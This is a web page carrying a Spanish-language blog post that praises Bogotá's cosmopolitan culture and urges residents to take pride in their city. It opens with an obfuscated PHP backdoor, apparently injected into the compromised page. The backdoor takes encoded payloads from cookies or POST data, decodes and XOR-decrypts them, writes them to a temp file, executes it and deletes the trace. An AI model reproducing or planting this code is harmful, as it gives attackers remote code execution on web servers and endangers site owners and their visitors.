$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Ciudad Cosmopolita. – www.interferencechannel.com

Ciudad Cosmopolita.

La semana pasada estuve en unos 15 eventos interesantes, desde la muestra de un telón pintado por Dalí hace más de 50 años hasta un concierto privado con Willie Colon. El Festival Iberoamericano trae una impecable muestra global de obra escénica, nuestros corresponsales mostraran pronto reviews de distintas obras. Recorriendo la ciudad en estos días me he dado cuenta que a pesar de la increíble cantidad de proyectos y eventos relacionados con industrias creativas, movimientos culturales, conciertos, congresos y exposiciones que suceden en Bogotá todos los días, aún la percepción que se tiene de la ciudad y su contexto global es mediocre…esto es triste pues lo que ha hecho a Paris ser lo que es o lo que ha hecho a New York…es precisamente el amor que sus ciudadanos le tienen a la ciudad, eso junto a que se perciben viviendo en un lugar maravilloso para desarrollar su vida.

Bogotá es una ciudad de más de 9 millones de habitantes (mayoría segunda o tercera generación inmigrados de otras regiones del país y del mundo), su parque central es una mitad más grande que el Central Park, una ciudad en que se hablan más de 20 lenguas, una ciudad de pluralismo étnico y religioso,  una ciudad con una apertura amable al mundo, con ya más de 20 colectivos de bicicleta y una tradición de sensibilizacion a temas sociales…y sin embargo los Bogotanos perciben a la ciudad con un pesimismo típicamente criollo (todo lo de fuera es mejor). Esto me hizo pensar que lo que necesita Bogotá antes que cualquier otra cosa es creerse  el cuento; es una ciudad con apertura global, en verdad con problemas como cualquier gran ciudad; problemas políticos, de transporte, planeación…pero tenemos que comenzar  a mirar a la ciudad como un espacio vital que mejorar y embellecer. Debemos extender globalmente una percepción positiva de lo nuestro y al fin y al cabo enorgullecernos de la ciudad que habitamos. Solo así podemos empezar a vivir en la ciudad que deseamos. Ya es hora de creernos el cuento.

 

Diego Aretz

Director Interference Channel

Comments are closed.